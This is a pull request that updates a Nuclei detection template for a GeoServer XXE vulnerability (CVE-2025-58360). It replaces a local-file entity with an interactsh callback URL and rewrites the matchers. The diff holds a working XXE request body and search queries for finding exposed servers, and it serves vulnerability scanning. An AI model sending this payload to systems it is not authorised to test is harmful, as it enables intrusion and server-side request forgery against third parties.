### PR TITLE
fix(CVE-2025-58360): switch GeoServer XXE detection to OAST (FN on Java 11+)

### DIFF
--- a/http/cves/2025/CVE-2025-58360.yaml
+++ b/http/cves/2025/CVE-2025-58360.yaml
@@ -25,6 +25,11 @@ info:
     max-request: 2
     vendor: osgeo
     product: geoserver
+    note: |
+      Detection uses OAST (interactsh) callbacks to confirm external entity resolution.
+      Earlier revision relied on `java.io.FileNotFoundException` reflection, which is
+      Java-runtime-dependent (e.g., Java 11 surfaces `java.nio.file.NoSuchFileException`
+      and other variants), causing false negatives. See #15048.
     shodan-query:
       - title:"geoserver"
       - 'http.html_hash:1093634893 "Content-Disposition: inline"'
@@ -35,7 +40,7 @@ info:
       - app="geoserver"
       - icon_hash="97540678"
       - body="/geoserver/"
-  tags: cve,cve2025,geoserver,xxe,wms,vkev,kev
+  tags: cve,cve2025,geoserver,xxe,wms,vkev,kev,oast
 
 http:
   - method: POST
@@ -48,7 +53,7 @@ http:
 
     body: |
       <?xml version="1.0" encoding="UTF-8"?>
-      <!DOCTYPE root [ <!ENTITY xxe SYSTEM "/this_file_does_not_exist"> ]>
+      <!DOCTYPE root [ <!ENTITY xxe SYSTEM "http://{{interactsh-url}}/CVE-2025-58360"> ]>
       <StyledLayerDescriptor version="1.0.0">
       <NamedLayer><Name>&xxe;</Name></NamedLayer>
       </StyledLayerDescriptor>
@@ -58,12 +63,14 @@ http:
     matchers-condition: and
     matchers:
       - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+          - "dns"
+        condition: or
+
+      - type: word
+        part: body
         words:
           - "ServiceException"
-          - "java.io.FileNotFoundException"
-        condition: and
-
-      - type: status
-        status:
-          - 200
 # digest: 4a0a00473045022100da42fa3e0331cf10958b5f7ce07f274a879aa4f8d140e03e2683c5ed97a2f0bf022031fc4eaf7229ce9f9d3becf951836f36d98395485a4a09edb965da1aac51f1cf:922c64590222798bb761d5b6d8e72950


### PR DESCRIPTION
#### Template / PR Information
**Template**: `http/cves/2025/CVE-2025-58360.yaml`
**CVE**: CVE-2025-58360 (GeoServer XXE in WMS GetMap, CVSS 8.2, KEV)
**Type**: bug-fix (false negative)

#### Problem
Original matcher required `java.io.FileNotFoundException` in the response body. That exception class is the Java 8 / older-runtime form. On modern JVMs (Java 11+), file-system XXE attempts surface as `java.nio.file.NoSuchFileException`, `java.net.MalformedURLException`, or are wrapped inside `java.io.IOException` — none of which match. The reporter (#15048) confirmed the template misses vulnerable instances on Java 11.

The detection method is also fundamentally fragile: it depends on the *target's runtime exception hierarchy* rather than on the *exploit primitive itself*.

#### Fix
Switched to OAST-based detection — the standard pattern for XXE/SSRF in this repo:

```diff
- SYSTEM "/this_file_does_not_exist"
+ SYSTEM "http://{{interactsh-url}}/CVE-2025-58360"
```

Match on `interactsh_protocol` (http or dns) confirms the parser resolved the external entity — directly proves XXE primitive, independent of JVM version. `ServiceException` body match retained to confirm the SLD was parsed.

Added `oast` tag and a metadata note explaining the rationale.

#### Verification
- `yamllint -c .yamllint http/cves/2025/CVE-2025-58360.yaml` → clean
- `nuclei -t http/cves/2025/CVE-2025-58360.yaml -validate` → "All templates validated successfully"

Closes #15048